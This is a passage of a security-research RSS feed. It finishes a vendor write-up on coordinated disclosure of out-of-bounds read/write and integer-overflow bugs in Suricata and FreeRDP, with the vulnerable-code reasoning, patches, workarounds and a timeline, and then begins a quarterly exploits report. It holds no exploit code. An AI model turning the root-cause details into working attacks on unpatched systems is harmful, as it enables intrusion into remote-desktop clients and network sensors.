  3522. <p>The vulnerability resides in Suricata&#8217;s base64 decoding function, <a href="https://github.com/OISF/suricata/blob/789353bc1e1aa23d075f16af25df84df00c68682/src/util-base64.c#L109-L206" target="_blank" rel="noopener">DecodeBase64</a>, and belongs to the out-of-bounds write type. In a situation where the buffer is full, it is possible to use specially crafted input to trick the function into thinking that there is some space left and writing three more bytes to the buffer. In base64, if the size of the unencoded data is not a multiple of three, a padding is added to the encoded output. It typically equals one or two. The decoding function accepts encoded data as input, which means that the padding is controlled by the attacker. If they provide an encoded string where the padding equals three or four, a memory corruption occurs, leading to a limited buffer overflow, which may result in remote code execution.</p>
  3523. <div id="attachment_113492" style="width: 663px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132308/Vulnerabilities_in_Suricata_and_FreeRDP_01.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113492" class="size-large wp-image-113492" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132308/Vulnerabilities_in_Suricata_and_FreeRDP_01-653x1024.png" alt="Vulnerable code in Suricata:line 45 – if 'padding' is equal to B64_BLOCK(4) or ASCII_BLOCK(3), 'numDecoded_blk' will be set to 0;
  3524. line 46 – we will pass this check, as 'dest_size' is equal to '*decoded_bytes';
  3525. line 53 – 3 bytes will be written past the end of buffer 'dptr';
  3526. line 72 – similar issue." width="653" height="1024" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132308/Vulnerabilities_in_Suricata_and_FreeRDP_01-653x1024.png 653w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132308/Vulnerabilities_in_Suricata_and_FreeRDP_01-191x300.png 191w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132308/Vulnerabilities_in_Suricata_and_FreeRDP_01-768x1205.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132308/Vulnerabilities_in_Suricata_and_FreeRDP_01-223x350.png 223w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132308/Vulnerabilities_in_Suricata_and_FreeRDP_01-637x1000.png 637w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132308/Vulnerabilities_in_Suricata_and_FreeRDP_01-178x280.png 178w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132308/Vulnerabilities_in_Suricata_and_FreeRDP_01-574x900.png 574w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132308/Vulnerabilities_in_Suricata_and_FreeRDP_01.png 875w" sizes="(max-width: 653px) 100vw, 653px" /></a><p id="caption-attachment-113492" class="wp-caption-text">Vulnerable code in Suricata:<br />line 45 – if &#8216;padding&#8217; is equal to B64_BLOCK(4) or ASCII_BLOCK(3), &#8216;numDecoded_blk&#8217; will be set to 0;<br />line 46 – we will pass this check, as &#8216;dest_size&#8217; is equal to &#8216;*decoded_bytes&#8217;;<br />line 53 – 3 bytes will be written past the end of buffer &#8216;dptr&#8217;;<br />line 72 – similar issue.</p></div>
  3527. <p>The issue was <a href="https://github.com/OISF/suricata/commit/fd47e67dc65f9111895c88fb406c938b1f857325" target="_blank" rel="noopener">patched</a> in Suricata versions 6.0.19 and 7.0.5. For those, who are unable to install these updates, the following recommendations to mitigate the threat were provided by the community:</p>
  3528. <ul>
  3529. <li>Do not load untrusted datasets</li>
  3530. <li>Do not use rules with a &#8216;base64_decode&#8217; keyword with a &#8216;bytes&#8217; option with a value of 1, 2 or 5</li>
  3531. </ul>
  3532. <p>For the software versions 7.0.x you can also set &#8216;app-layer.protocols.smtp.mime.body-md5&#8217; to false.</p>
  3533. <h2 id="freerdp-vulnerabilities">FreeRDP vulnerabilities</h2>
  3534. <p>The vulnerabilities in FreeRDP were found using <a href="https://github.com/ergnoorr/fuzzrdp" target="_blank" rel="noopener">a simple FreeRDP fuzzer</a>. They affect all FreeRDP 3.x.x versions prior to 3.5.0 and all FreeRDP 2.x.x versions prior to 2.11.6, where they were fixed.</p>
  3535. <h3 id="cve-2024-32041">CVE-2024-32041</h3>
  3536. <p>This vulnerability resides in the <a href="https://github.com/FreeRDP/FreeRDP/blob/d7ebec5a6524b1da9b90a327329fb5696bdab62c/libfreerdp/codec/zgfx.c#L217-L368" target="_blank" rel="noopener">zgfx_decompress_segment</a> function of the ZGFX decoder and is an out-of-bounds read vulnerability. The absence of a necessary check may lead to a situation where a certain number of bytes of data are accessed that shouldn&#8217;t be.</p>
  3537. <p>This vulnerability may be exploited by a malicious server to gain access to a portion of the client memory. It may be used to bypass address space layout randomization (ASLR) to get the address space layout for a particular process and perform an attack against that process.</p>
  3538. <div id="attachment_113493" style="width: 731px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132809/Vulnerabilities_in_Suricata_and_FreeRDP_02.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113493" class="size-large wp-image-113493" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132809/Vulnerabilities_in_Suricata_and_FreeRDP_02-721x1024.png" alt="Vulnerable code in the 'zgfx_decompress_segment' function:line 48 – the variable 'count' is checked to make sure it is not greater than the size of allocated space in the output buffer;
  3539. lines 54-55 – the variable 'count' is not checked against the size of the decoded array. Hence the out-of-bounds read." width="721" height="1024" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132809/Vulnerabilities_in_Suricata_and_FreeRDP_02-721x1024.png 721w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132809/Vulnerabilities_in_Suricata_and_FreeRDP_02-211x300.png 211w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132809/Vulnerabilities_in_Suricata_and_FreeRDP_02-768x1091.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132809/Vulnerabilities_in_Suricata_and_FreeRDP_02-246x350.png 246w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132809/Vulnerabilities_in_Suricata_and_FreeRDP_02-704x1000.png 704w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132809/Vulnerabilities_in_Suricata_and_FreeRDP_02-197x280.png 197w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132809/Vulnerabilities_in_Suricata_and_FreeRDP_02-634x900.png 634w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132809/Vulnerabilities_in_Suricata_and_FreeRDP_02.png 876w" sizes="(max-width: 721px) 100vw, 721px" /></a><p id="caption-attachment-113493" class="wp-caption-text">Vulnerable code in the &#8216;zgfx_decompress_segment&#8217; function:<br />line 48 – the variable &#8216;count&#8217; is checked to make sure it is not greater than the size of allocated space in the output buffer;<br />lines 54-55 – the variable &#8216;count&#8217; is not checked against the size of the decoded array. Hence the out-of-bounds read.</p></div>
  3540. <p>As a workaround for users who cannot install the fixed version of FreeRDP, the community recommends deactivating the &#8220;/gfx&#8221; connection method, which is on by default, and set &#8220;/bpp&#8221; or &#8220;/rfx&#8221; instead.</p>
  3541. <h3 id="cve-2024-32039">CVE-2024-32039</h3>
  3542. <p>This is an integer overflow and out-of-bounds write vulnerability in the <a href="https://github.com/FreeRDP/FreeRDP/blob/d7ebec5a6524b1da9b90a327329fb5696bdab62c/libfreerdp/codec/clear.c#L352-L441" target="_blank" rel="noopener">clear_decompress_residual_data</a> function in the Clear codec component. The &#8216;runLengthFactor&#8217; variable is read from the stream, which can be controlled by the attacker. The code performs a sanity check to make sure it is not bigger than the size of the array to be written to. This sanity check contains an error that allows the attacker to bypass it via unsigned integer overflow and write outside the allocated buffer. Exploitation of this vulnerability could lead to remote code execution on the client.</p>
  3543. <div id="attachment_113494" style="width: 765px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132904/Vulnerabilities_in_Suricata_and_FreeRDP_03.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113494" class="size-large wp-image-113494" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132904/Vulnerabilities_in_Suricata_and_FreeRDP_03-755x1024.png" alt="Vulnerable code in the 'clear_decompress_residual_data' function:line 23 – the variable 'runLengthFactor' is an unsigned integer (uint32);
  3544. line 42 – the variable 'runLengthFactor' is read from the stream;
  3545. line 47 – due to an unsigned integer overflow, if the 'runLengthFactor' value is large enough, the 'pixelIndex+runLengthFactor' value approaches zero, and the check is passed;
  3546. lines 56-60 – the 'for' cycle uses the original 'runLengthFactor' value and is written outside 'dstBuffer'.
  3547. " width="755" height="1024" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132904/Vulnerabilities_in_Suricata_and_FreeRDP_03-755x1024.png 755w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132904/Vulnerabilities_in_Suricata_and_FreeRDP_03-221x300.png 221w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132904/Vulnerabilities_in_Suricata_and_FreeRDP_03-768x1041.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132904/Vulnerabilities_in_Suricata_and_FreeRDP_03-258x350.png 258w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132904/Vulnerabilities_in_Suricata_and_FreeRDP_03-737x1000.png 737w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132904/Vulnerabilities_in_Suricata_and_FreeRDP_03-206x280.png 206w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132904/Vulnerabilities_in_Suricata_and_FreeRDP_03-664x900.png 664w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132904/Vulnerabilities_in_Suricata_and_FreeRDP_03.png 882w" sizes="(max-width: 755px) 100vw, 755px" /></a><p id="caption-attachment-113494" class="wp-caption-text">Vulnerable code in the &#8216;clear_decompress_residual_data&#8217; function:<br />line 23 – the variable &#8216;runLengthFactor&#8217; is an unsigned integer (uint32);<br />line 42 – the variable &#8216;runLengthFactor&#8217; is read from the stream;<br />line 47 – due to an unsigned integer overflow, if the &#8216;runLengthFactor&#8217; value is large enough, the &#8216;pixelIndex+runLengthFactor&#8217; value approaches zero, and the check is passed;<br />lines 56-60 – the &#8216;for&#8217; cycle uses the original &#8216;runLengthFactor&#8217; value and is written outside &#8216;dstBuffer&#8217;.</p></div>
  3548. <p>As a workaround for the unpatched versions, it is recommended to use &#8220;/bpp:32&#8221; or &#8220;/rfx&#8221; instead of the &#8220;/gfx&#8221; codec that is enabled by default.</p>
  3549. <h3 id="cve-2024-32040">CVE-2024-32040</h3>
  3550. <p>This integer underflow vulnerability affects FreeRDP connections that use the NSC codec responsible for bitmap compression. It resides in the <a href="https://github.com/FreeRDP/FreeRDP/blob/aa3d05f4f2c1d361f061402add8aed88174aac6d/libfreerdp/codec/nsc.c#L113-L189" target="_blank" rel="noopener">nsc_rle_decode</a> function of this component. The absence of a necessary check may lead to a situation when the size of unprocessed input data is less than 0. As it is an unsigned integer variable, it will become a large positive value in this case. This may lead to an out-of-bounds read of a large amount of data.</p>
  3551. <div id="attachment_113495" style="width: 604px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132946/Vulnerabilities_in_Suricata_and_FreeRDP_04.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113495" class="size-large wp-image-113495" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132946/Vulnerabilities_in_Suricata_and_FreeRDP_04-594x1024.png" alt="Vulnerable code in the nsc_rle_decode function:lines 45-48 – the variable 'len' is read from the attacker-controlled stream;
  3552. line 51 – suppose 'len' is a large integer and it is less than 'outSize', thus we can pass this check;
  3553. line 57 – there is no check to ensure that 'left' is greater than 'len', which may result in an unsigned integer underflow, and the big value of the 'left' variable;
  3554. line 6 – the big value of the 'left' variable passes the check, and the next iteration starts reading outside the memory bounds.
  3555. " width="594" height="1024" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132946/Vulnerabilities_in_Suricata_and_FreeRDP_04-594x1024.png 594w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132946/Vulnerabilities_in_Suricata_and_FreeRDP_04-174x300.png 174w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132946/Vulnerabilities_in_Suricata_and_FreeRDP_04-203x350.png 203w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132946/Vulnerabilities_in_Suricata_and_FreeRDP_04-580x1000.png 580w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132946/Vulnerabilities_in_Suricata_and_FreeRDP_04-162x280.png 162w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132946/Vulnerabilities_in_Suricata_and_FreeRDP_04-522x900.png 522w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21132946/Vulnerabilities_in_Suricata_and_FreeRDP_04.png 742w" sizes="(max-width: 594px) 100vw, 594px" /></a><p id="caption-attachment-113495" class="wp-caption-text">Vulnerable code in the nsc_rle_decode function:<br />lines 45-48 – the variable &#8216;len&#8217; is read from the attacker-controlled stream;<br />line 51 – suppose &#8216;len&#8217; is a large integer and it is less than &#8216;outSize&#8217;, thus we can pass this check;<br />line 57 – there is no check to ensure that &#8216;left&#8217; is greater than &#8216;len&#8217;, which may result in an unsigned integer underflow, and the big value of the &#8216;left&#8217; variable;<br />line 6 – the big value of the &#8216;left&#8217; variable passes the check, and the next iteration starts reading outside the memory bounds.</p></div>
  3556. <p>As a workaround in a situation where installing the patched version is impossible, it is recommended not to use the codec in question.</p>
  3557. <h3 id="cve-2024-32458">CVE-2024-32458</h3>
  3558. <p>This is an out-of-bounds read vulnerability in the <a href="https://github.com/FreeRDP/FreeRDP/blob/9da3f236985207378abe64bc401cecd8566e4542/libfreerdp/codec/planar.c#L166-L228" target="_blank" rel="noopener">planar_skip_plane_rle</a> function in the Planar codec component. No checks are implemented for the planes array elements in the function code. As a result, the SrcSize variable may exceed the amount of available data, which may result in an out-of-bounds read. An attacker may attempt to bypass ASLR using this vulnerability.</p>
  3559. <div id="attachment_113496" style="width: 842px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21133028/Vulnerabilities_in_Suricata_and_FreeRDP_05.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113496" class="size-large wp-image-113496" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21133028/Vulnerabilities_in_Suricata_and_FreeRDP_05-832x1024.png" alt="Vulnerable code in the planar_skip_plane_rle function:line 13 – no check is performed to ensure the size is no less than the offset to plane. If it is small enough, an unsigned integer underflow occurs;
  3560. line 45 – as a result, SrcSize can exceed the amount of available data;
  3561. line 52 – out-of-bounds read on this line.
  3562. " width="832" height="1024" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21133028/Vulnerabilities_in_Suricata_and_FreeRDP_05-832x1024.png 832w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21133028/Vulnerabilities_in_Suricata_and_FreeRDP_05-244x300.png 244w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21133028/Vulnerabilities_in_Suricata_and_FreeRDP_05-768x946.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21133028/Vulnerabilities_in_Suricata_and_FreeRDP_05-284x350.png 284w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21133028/Vulnerabilities_in_Suricata_and_FreeRDP_05-740x911.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21133028/Vulnerabilities_in_Suricata_and_FreeRDP_05-227x280.png 227w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21133028/Vulnerabilities_in_Suricata_and_FreeRDP_05-731x900.png 731w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21133028/Vulnerabilities_in_Suricata_and_FreeRDP_05.png 838w" sizes="(max-width: 832px) 100vw, 832px" /></a><p id="caption-attachment-113496" class="wp-caption-text">Vulnerable code in the planar_skip_plane_rle function:<br />line 13 – no check is performed to ensure the size is no less than the offset to plane. If it is small enough, an unsigned integer underflow occurs;<br />line 45 – as a result, SrcSize can exceed the amount of available data;<br />line 52 – out-of-bounds read on this line.</p></div>
  3563. <p>You can find the fix for the vulnerability <a href="https://github.com/FreeRDP/FreeRDP/commit/9da3f236985207378abe64bc401cecd8566e4542" target="_blank" rel="noopener">here</a>. As a workaround for unpatched systems, it is recommended to use &#8220;/gfx&#8221; or &#8220;/rfx&#8221; connection methods. Note that the &#8220;/gfx&#8221; method is enabled by default and it is recommended to disable it to mitigate other vulnerabilities in this list.</p>
  3564. <h3 id="cve-2024-32459">CVE-2024-32459</h3>
  3565. <p>This is an out-of-bounds read vulnerability in <a href="https://github.com/FreeRDP/FreeRDP/blob/70eec6c18e86f21c31ba254aa0e798330a95fc71/libfreerdp/codec/ncrush.c#L2015-L2312" target="_blank" rel="noopener">ncrush_decompress</a> function of the ncrush codec. If the source data size is small, up to four extra bytes could be read, which could be used to bypass ASLR.</p>
  3566. <div id="attachment_113497" style="width: 756px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21133114/Vulnerabilities_in_Suricata_and_FreeRDP_06.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113497" class="size-full wp-image-113497" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21133114/Vulnerabilities_in_Suricata_and_FreeRDP_06.png" alt="Vulnerable code in the 'ncrush_decompress' function:Line 18 – Out-of-bounds read if SrcSize is less than 4.
  3567. " width="746" height="365" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21133114/Vulnerabilities_in_Suricata_and_FreeRDP_06.png 746w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21133114/Vulnerabilities_in_Suricata_and_FreeRDP_06-300x147.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21133114/Vulnerabilities_in_Suricata_and_FreeRDP_06-715x350.png 715w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21133114/Vulnerabilities_in_Suricata_and_FreeRDP_06-740x362.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21133114/Vulnerabilities_in_Suricata_and_FreeRDP_06-572x280.png 572w" sizes="(max-width: 746px) 100vw, 746px" /></a><p id="caption-attachment-113497" class="wp-caption-text">Vulnerable code in the &#8216;ncrush_decompress&#8217; function:<br />Line 18 – Out-of-bounds read if SrcSize is less than 4.</p></div>
  3568. <p>There are no workarounds for the unpatched versions of the FreeRDP client.</p>
  3569. <h3 id="cve-2024-32460">CVE-2024-32460</h3>
  3570. <p>This is an out-of-bounds read vulnerability in <a href="https://github.com/FreeRDP/FreeRDP/blob/d7ebec5a6524b1da9b90a327329fb5696bdab62c/libfreerdp/codec/interleaved.c#L229-L252" target="_blank" rel="noopener">ExtractRunLengthLiteFgBg</a> function in the Interleaved codec component. It affects FreeRDP clients that use the legacy &#8220;GDI&#8221; drawing path for transmitting graphics from the remote desktop. This function accepts the pointer to the first element after the allocated buffer and incorrectly handles the &#8216;buffer_within_range&#8217; helper, causing it to read one byte outside the buffer.</p>
  3571. <div id="attachment_113498" style="width: 563px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21133201/Vulnerabilities_in_Suricata_and_FreeRDP_07.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113498" class="size-large wp-image-113498" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21133201/Vulnerabilities_in_Suricata_and_FreeRDP_07-553x1024.png" alt="Vulnerable code in the ExtractRunLengthLiteFgBg function:line 11 – 'pbEnd' points to the first byte after the end of buffer;
  3572. line 26 – the 'ExtractRunLength' function is called with 'pbEnd' as the third parameter;
  3573. line 51 – the 'ExtractRunLengthLiteFgBg' function is called with 'pbEnd' as a second parameter;
  3574. line 77 – the 'ExtractRunLengthLiteFgBg' function checks that there is one byte before the end of the buffer;
  3575. line 82 – the code reads one byte outside of the allocated buffer.
  3576. " width="553" height="1024" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21133201/Vulnerabilities_in_Suricata_and_FreeRDP_07-553x1024.png 553w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21133201/Vulnerabilities_in_Suricata_and_FreeRDP_07-162x300.png 162w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21133201/Vulnerabilities_in_Suricata_and_FreeRDP_07-768x1422.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21133201/Vulnerabilities_in_Suricata_and_FreeRDP_07-830x1536.png 830w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21133201/Vulnerabilities_in_Suricata_and_FreeRDP_07-189x350.png 189w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21133201/Vulnerabilities_in_Suricata_and_FreeRDP_07-540x1000.png 540w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21133201/Vulnerabilities_in_Suricata_and_FreeRDP_07-151x280.png 151w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21133201/Vulnerabilities_in_Suricata_and_FreeRDP_07-486x900.png 486w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21133201/Vulnerabilities_in_Suricata_and_FreeRDP_07.png 869w" sizes="(max-width: 553px) 100vw, 553px" /></a><p id="caption-attachment-113498" class="wp-caption-text">Vulnerable code in the <a href="https://github.com/FreeRDP/FreeRDP/blob/d7ebec5a6524b1da9b90a327329fb5696bdab62c/libfreerdp/codec/interleaved.c#L229-L252" target="_blank" rel="noopener">ExtractRunLengthLiteFgBg</a> function:<br />line 11 – &#8216;pbEnd&#8217; points to the first byte after the end of buffer;<br />line 26 – the &#8216;ExtractRunLength&#8217; function is called with &#8216;pbEnd&#8217; as the third parameter;<br />line 51 – the &#8216;ExtractRunLengthLiteFgBg&#8217; function is called with &#8216;pbEnd&#8217; as a second parameter;<br />line 77 – the &#8216;ExtractRunLengthLiteFgBg&#8217; function checks that there is one byte before the end of the buffer;<br />line 82 – the code reads one byte outside of the allocated buffer.</p></div>
  3577. <p>You can find the fix for the vulnerability <a href="https://github.com/FreeRDP/FreeRDP/commit/ecfafe4ad054435d84cb7b111ea73ebd46832fb6" target="_blank" rel="noopener">here</a>. The workaround for unpatched systems could be to use more recent settings such as &#8220;/gfx&#8221; or &#8220;/rfx&#8221; if the server supports them. Note that some of the other vulnerabilities in this list affect FreeRDP clients that use &#8220;/gfx&#8221; as the drawing path.</p>
  3578. <p>We shared our fuzzing tests with the FreeRDP community, along with information about the vulnerabilities that were found. They ran them against various codecs used in the software and found 10 more vulnerabilities in the following components:</p>
  3579. <ul>
  3580. <li>Clear codec</li>
  3581. <li>Color codec</li>
  3582. <li>Interleaved codec</li>
  3583. <li>NSC codec</li>
  3584. <li>ZGFX codec</li>
  3585. </ul>
  3586. <p>Most of these vulnerabilities are out-of-bounds reads that can be used to bypass the ASLR security measure. All of them were fixed in versions 3.5.1 and 2.11.7.</p>
  3587. <h2 id="disclosure-timeline">Disclosure timeline</h2>
  3588. <ul>
  3589. <li>28.03.2024 – We shared information about the vulnerabilities with the Suricata community.</li>
  3590. <li>15.04.2024 – We reported the discovered vulnerabilities to the FreeRDP community.</li>
  3591. <li>16.04.2024 – FreeRDP fixes issued.</li>
  3592. <li>20.04.2024 – Fixes issued for the vulnerabilities discovered by the community using our fuzzer.</li>
  3593. <li>23.04.2024 – Patched Suricata versions issued.</li>
  3594. </ul>
  3595. <h2 id="conclusion">Conclusion</h2>
  3596. <p>The concept of secure by design applies not only to system architecture, but also to the development process itself. Moreover, by testing and trying all the system components prior to release, we were able to help the community fix a range of issues in two widely used open-source projects. We would like to thank the Suricata and FreeRDP maintainers for their quick response to our reports and prompt release of the patches.</p>
  3597. <p>If you use this software, we encourage you to update to the latest versions as soon as possible. At the time of publication, the most up-to-date versions are:</p>
  3598. <ul>
  3599. <li>6.0.20 and 7.0.6 for Suricata;</li>
  3600. <li>2.11.7 and 3.7.0 for FreeRDP.</li>
  3601. </ul>
  3602. ]]></content:encoded>
  3603. <wfw:commentRss>https://securelist.com/suricata-freerdp-memory-corruption/113489/feed/</wfw:commentRss>
  3604. <slash:comments>0</slash:comments>
  3605. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/22075412/SL-Suricata-FreeRDP-vulnerabilities-featured.jpg" width="1376" height="864"><media:keywords>full</media:keywords></media:content>
  3606. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/22075412/SL-Suricata-FreeRDP-vulnerabilities-featured-1024x643.jpg" width="1024" height="643"><media:keywords>large</media:keywords></media:content>
  3607. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/22075412/SL-Suricata-FreeRDP-vulnerabilities-featured-300x188.jpg" width="300" height="188"><media:keywords>medium</media:keywords></media:content>
  3608. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/22075412/SL-Suricata-FreeRDP-vulnerabilities-featured-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  3609. </item>
  3610. <item>
  3611. <title>Exploits and vulnerabilities in Q2 2024</title>
  3612. <link>https://securelist.com/vulnerability-exploit-report-q2-2024/113455/</link>
  3613. <comments>https://securelist.com/vulnerability-exploit-report-q2-2024/113455/#respond</comments>
  3614. <dc:creator><![CDATA[Vitaly Morgunov, Alexander Kolesnikov]]></dc:creator>
  3615. <pubDate>Wed, 21 Aug 2024 10:00:10 +0000</pubDate>
  3616. <category><![CDATA[Vulnerability reports]]></category>
  3617. <category><![CDATA[Drivers]]></category>
  3618. <category><![CDATA[Linux]]></category>
  3619. <category><![CDATA[Microsoft Exchange]]></category>
  3620. <category><![CDATA[Microsoft Office]]></category>
  3621. <category><![CDATA[Microsoft Sharepoint]]></category>
  3622. <category><![CDATA[Microsoft Windows]]></category>
  3623. <category><![CDATA[Targeted attacks]]></category>
  3624. <category><![CDATA[Vulnerabilities]]></category>
  3625. <category><![CDATA[Vulnerabilities and exploits]]></category>
  3626. <category><![CDATA[Vulnerability Statistics]]></category>
  3627. <category><![CDATA[Web app vulnerabilities]]></category>
  3628. <category><![CDATA[Zero-day vulnerabilities]]></category>
  3629. <category><![CDATA[Vulnerabilities and exploits]]></category>
  3630. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=113455</guid>
  3631.  
  3632. <description><![CDATA[The report contains statistics on vulnerabilities and exploits, with an analysis of interesting vulnerabilities found in Q2 2024.]]></description>
  3633. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21072724/SL-vulnerability-exploit-report-featured-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>Q2 2024 was eventful in terms of new interesting vulnerabilities and exploitation techniques for applications and operating systems. Attacks through vulnerable drivers have become prevalent as a general means of privilege escalation in the operating system. Such attacks are notable in that the vulnerability does not have to be fresh, since attackers themselves deliver unpatched drivers to the system. This report considers the statistics of research publications that can be used by cybercriminals to attack target systems, and provides statistical snapshots of vulnerabilities.</p>
  3634. <h2 id="statistics-on-registered-vulnerabilities">Statistics on registered vulnerabilities</h2>
  3635. <p>In this section, we look at statistics on registered vulnerabilities based on data from the <a href="https://www.cve.org/" target="_blank" rel="noopener">cve.org</a> portal.</p>
  3636. <p>In Q2 2024, the number of registered vulnerabilities exceeded last year&#8217;s figure for the same period, and is likely to grow further, as some vulnerabilities are not added to the CVE list immediately after registration. This trend is in line with the general uptick in the number of registered vulnerabilities that we noted in our <a href="https://securelist.com/vulnerability-report-q1-2024/112554/" target="_blank" rel="noopener">Q1 report</a>.</p>
  3637. <div class="js-infogram-embed" data-id="_/eovrwyUizZopbBh5w8Lj" data-type="interactive" data-title="01 EN Exploit report data" style="min-height:;"></div>
  3638. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Total number of registered vulnerabilities and number of critical ones, Q2 2023 and Q2 2024 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/20190348/01-en-exploit-report-data.png" target="_blank" rel="noopener">download</a>)</em></p>
  3639. <p>Comparing the data for the period 2019–2024 we see that in H1 2024 the total number of registered vulnerabilities was slightly less than half of the figure for the whole of 2023. Worth noting is the quarter-on-quarter rise in the number of registered vulnerabilities, for which reason we cannot say for sure that it won&#8217;t exceed the 2023 figure by year&#8217;s end.</p>
  3640. <div class="js-infogram-embed" data-id="_/ZVv8iyTaJKXWJNcBtAJT" data-type="interactive" data-title="02 EN Exploit report data" style="min-height:;"></div>
